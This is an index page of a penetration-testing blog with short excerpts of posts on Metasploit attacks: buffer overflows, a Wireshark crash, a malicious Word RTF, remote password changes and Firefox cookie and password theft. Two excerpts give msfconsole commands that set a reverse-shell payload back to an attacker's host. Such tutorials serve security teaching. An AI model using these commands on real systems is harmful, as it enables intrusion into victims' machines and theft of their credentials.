Skip to content

Hacking Articles

Raj Chandel’s Blog

  • Courses We Offer
  • CTF Challenges
  • Penetration Testing
  • Web Penetration Testing
  • Red Teaming
  • Donate us
Penetration Testing

Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

 This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled

Penetration Testing

Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when

Penetration Testing

Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC

Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host) msf exploit (firefox_xpi_bootstrapped_addon)>set uripath / msf

Penetration Testing

Exploit Save Password in Mozilla Firefox in Remote Windows, Linux or MAC PC

Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host) msf exploit (firefox_xpi_bootstrapped_addon)>set uripath / msf

Penetration Testing

How to Gather MUICache Entries in Remote Windows PC

According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of

Penetration Testing

How to Crash Running Wireshark of Remote PC using CAPWAP Dissector DoS

This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well as 1.6.0 to 1.6.15. The vulnerability exists in

Penetration Testing

Hack Remote PC using Wireshark wiretap/mpeg.c Stack Buffer Overflow

This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.) Exploit Targets Wireshark <= 1.8.12/1.10.5 Requirement Attacker: kali Linux

Penetration Testing

Hack Remote Victim PC with MS Office Document

This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in

Penetration Testing

Set New Password of Victim PC Remotely

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a

Posts pagination

Previous 1 … 147 148 149 … 155 Next

Categories

© All Rights Reserved 2024 Theme: Prefer by Template Sell.